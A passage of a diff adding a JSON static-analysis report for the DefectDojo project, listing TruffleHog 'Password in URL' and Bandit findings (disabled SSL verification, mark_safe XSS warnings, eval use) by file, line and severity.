}, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "setup/scripts/common/dojo-shared-resources.sh:cd35d0621aa5b6223a812bc618cda3c037c81973ad3285070f1ac62c7fd04b1f:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "setup/scripts/common/dojo-shared-resources.sh", + "start_line": 493, + "end_line": 493, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "setup/scripts/os/linux.sh:4d29e6f03b929e137462e9e8691ff7e7463048983b6ba57fb760aae13c11a75b:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "setup/scripts/os/linux.sh", + "start_line": 282, + "end_line": 282, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "message": "Requests call with verify=False disabling SSL certificate checks, security issue.", + "cve": "tests/check_status.py:b75a5383b20ff7998b549669f81157bb6a63ec522d4f63306a262a7ee971ef50:B501", + "severity": "High", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/check_status.py", + "start_line": 61, + "end_line": 61, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B501", + "value": "B501", + "url": "https://docs.openstack.org/bandit/latest/plugins/b501_request_with_no_cert_validation.html" + } + ] + }, + { + "category": "sast", + "message": "Requests call with verify=False disabling SSL certificate checks, security issue.", + "cve": "tests/check_status.py:c8197e0544a456059ce0a2351c220a09095cec8f353771255682a54a14fb182c:B501", + "severity": "High", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/check_status.py", + "start_line": 70, + "end_line": 70, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B501", + "value": "B501", + "url": "https://docs.openstack.org/bandit/latest/plugins/b501_request_with_no_cert_validation.html" + } + ] + }, + { + "category": "sast", + "message": "Requests call with verify=False disabling SSL certificate checks, security issue.", + "cve": "tests/check_status.py:c8197e0544a456059ce0a2351c220a09095cec8f353771255682a54a14fb182c:B501", + "severity": "High", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/check_status.py", + "start_line": 79, + "end_line": 79, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B501", + "value": "B501", + "url": "https://docs.openstack.org/bandit/latest/plugins/b501_request_with_no_cert_validation.html" + } + ] + }, + { + "category": "sast", + "message": "Requests call with verify=False disabling SSL certificate checks, security issue.", + "cve": "tests/check_status.py:c8197e0544a456059ce0a2351c220a09095cec8f353771255682a54a14fb182c:B501", + "severity": "High", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/check_status.py", + "start_line": 51, + "end_line": 51, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B501", + "value": "B501", + "url": "https://docs.openstack.org/bandit/latest/plugins/b501_request_with_no_cert_validation.html" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/finding/views.py:1a36ff64cacd4285dd7cf6eb408304de6885feba5761b1754de34259dfc983f8:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/finding/views.py", + "start_line": 1293, + "end_line": 1295, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/finding/views.py:1a36ff64cacd4285dd7cf6eb408304de6885feba5761b1754de34259dfc983f8:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/finding/views.py", + "start_line": 1293, + "end_line": 1295, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/forms.py:30697c2b83aa3f80d65bc3a8e90fce40b00d1909d11aa2461e6150d221af2c5e:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 122, + "end_line": 122, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/forms.py:30697c2b83aa3f80d65bc3a8e90fce40b00d1909d11aa2461e6150d221af2c5e:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 122, + "end_line": 122, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/forms.py:a0090bb4aff12faf70e10e7b9a7237bc1c9dfc0318970659651a92fd20b828c9:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 58, + "end_line": 58, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/forms.py:a0090bb4aff12faf70e10e7b9a7237bc1c9dfc0318970659651a92fd20b828c9:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 50, + "end_line": 50, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/forms.py:a0090bb4aff12faf70e10e7b9a7237bc1c9dfc0318970659651a92fd20b828c9:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 42, + "end_line": 42, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/forms.py:a0090bb4aff12faf70e10e7b9a7237bc1c9dfc0318970659651a92fd20b828c9:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 50, + "end_line": 50, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/forms.py:a0090bb4aff12faf70e10e7b9a7237bc1c9dfc0318970659651a92fd20b828c9:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 42, + "end_line": 42, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/forms.py:a0090bb4aff12faf70e10e7b9a7237bc1c9dfc0318970659651a92fd20b828c9:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/forms.py", + "start_line": 58, + "end_line": 58, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of possibly insecure function - consider using safer ast.literal_eval.", + "cve": "dojo/google_sheet/views.py:3179111f4a512eb1bce4d1849a63a4f44c60ba701a7a1cd0867d9b701deb911e:B307", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/google_sheet/views.py", + "start_line": 788, + "end_line": 788, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B307", + "value": "B307" + } + ] + }, + { + "category": "sast", + "message": "Use of possibly insecure function - consider using safer ast.literal_eval.", + "cve": "dojo/google_sheet/views.py:a58bd7716041e6ee1c32bc8be9bc66f87601c075f021de22b29eb8bd6b82ee2b:B307", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/google_sheet/views.py", + "start_line": 786, + "end_line": 786, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B307", + "value": "B307" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:036a2fcffa4cad42c948dab73377334e3df3a8664bed0f34cfb217d3739c5bdd:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 181, + "end_line": 181, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:036a2fcffa4cad42c948dab73377334e3df3a8664bed0f34cfb217d3739c5bdd:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 204, + "end_line": 204, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:036a2fcffa4cad42c948dab73377334e3df3a8664bed0f34cfb217d3739c5bdd:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 163, + "end_line": 163, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:1777dbb9d46e7f34a15f6f79678bc2951f92a2a218721c0e6ce1819f47fbc771:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 374, + "end_line": 374, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:1777dbb9d46e7f34a15f6f79678bc2951f92a2a218721c0e6ce1819f47fbc771:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 295, + "end_line": 295, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:1777dbb9d46e7f34a15f6f79678bc2951f92a2a218721c0e6ce1819f47fbc771:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 295, + "end_line": 295, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:1777dbb9d46e7f34a15f6f79678bc2951f92a2a218721c0e6ce1819f47fbc771:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 374, + "end_line": 374, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:180f6c3138ca70881e3f966a7f50c995ac06762132106acf5baf6029fbb6ef87:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 139, + "end_line": 139, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:22c625c4b5195514ed916b531e05d03183859070f7c90ac74adf080032e4284a:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 160, + "end_line": 160, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:24efac74b9185d9613acb0862a7dacdbcf9fe5702675a48d27656f6fd1e65caf:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 384, + "end_line": 384, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:24efac74b9185d9613acb0862a7dacdbcf9fe5702675a48d27656f6fd1e65caf:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 316, + "end_line": 316, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:24efac74b9185d9613acb0862a7dacdbcf9fe5702675a48d27656f6fd1e65caf:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 384, + "end_line": 384, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:24efac74b9185d9613acb0862a7dacdbcf9fe5702675a48d27656f6fd1e65caf:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 316, + "end_line": 316, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:2aeb539f51f9dbafa0f7c397f5bf5b3c568132af9d5d260d72bd9567eec9f3d6:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 228, + "end_line": 228, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:2aeb539f51f9dbafa0f7c397f5bf5b3c568132af9d5d260d72bd9567eec9f3d6:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 228, + "end_line": 228, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:3952aadd50072f2f4f87233cdee91d09075522b1097850d7b2d7be4fe7ca4d8b:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 145, + "end_line": 148, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:3952aadd50072f2f4f87233cdee91d09075522b1097850d7b2d7be4fe7ca4d8b:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 145, + "end_line": 148, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:3a19db702835df97699dba14514d491897110cc440183b72e448e54844bf6172:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 239, + "end_line": 239, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:3a19db702835df97699dba14514d491897110cc440183b72e448e54844bf6172:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 239, + "end_line": 239, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:96af52918a417777a4fcc830be862544ad4b29d4db9d36ab9507aef7d255a2b6:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 233, + "end_line": 233, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:96af52918a417777a4fcc830be862544ad4b29d4db9d36ab9507aef7d255a2b6:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 233, + "end_line": 233, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:d40780ead5af790dc78de5d21af7d853a565a33012dfaacd2718fad55e632dce:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 215, + "end_line": 215, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:d40780ead5af790dc78de5d21af7d853a565a33012dfaacd2718fad55e632dce:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 193, + "end_line": 193, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:d40780ead5af790dc78de5d21af7d853a565a33012dfaacd2718fad55e632dce:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 193, + "end_line": 193, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:d40780ead5af790dc78de5d21af7d853a565a33012dfaacd2718fad55e632dce:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 215, + "end_line": 215, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:e183821e1294de2c84f8608fc24af8bae0f2bf199520f6848b36948682f8df82:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 305, + "end_line": 305, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:e183821e1294de2c84f8608fc24af8bae0f2bf199520f6848b36948682f8df82:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 365, + "end_line": 365, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:e183821e1294de2c84f8608fc24af8bae0f2bf199520f6848b36948682f8df82:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 365, + "end_line": 365, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:e183821e1294de2c84f8608fc24af8bae0f2bf199520f6848b36948682f8df82:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 305, + "end_line": 305, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:ea4c6ab95275b82f672fe021f7acf64df297d15274c8bf5faffde8600ca92f1b:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 142, + "end_line": 142, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/reports/widgets.py:fd09529cdd2dccb3553e2faa9d6f5468b0d874e131be03a280c72d19843b8d7f:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 170, + "end_line": 170, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/reports/widgets.py:fd09529cdd2dccb3553e2faa9d6f5468b0d874e131be03a280c72d19843b8d7f:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/reports/widgets.py", + "start_line": 170, + "end_line": 170, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:0d30f007e501126c5fe9c88c0d0e38c6cc86eb04596f959dbf1b983c3c602acb:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 566, + "end_line": 566, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:0d30f007e501126c5fe9c88c0d0e38c6cc86eb04596f959dbf1b983c3c602acb:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 566, + "end_line": 566, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:0f311263567a8a02c5c8ac3c670e58b329c73e61d05accc52905838cb3631633:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 618, + "end_line": 618, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:0f311263567a8a02c5c8ac3c670e58b329c73e61d05accc52905838cb3631633:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 618, + "end_line": 618, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:0f9b1254dd27c226bbcb1844593e4c00335b4dd1c581cb78c4d96ef48d8c933b:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 626, + "end_line": 626, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on 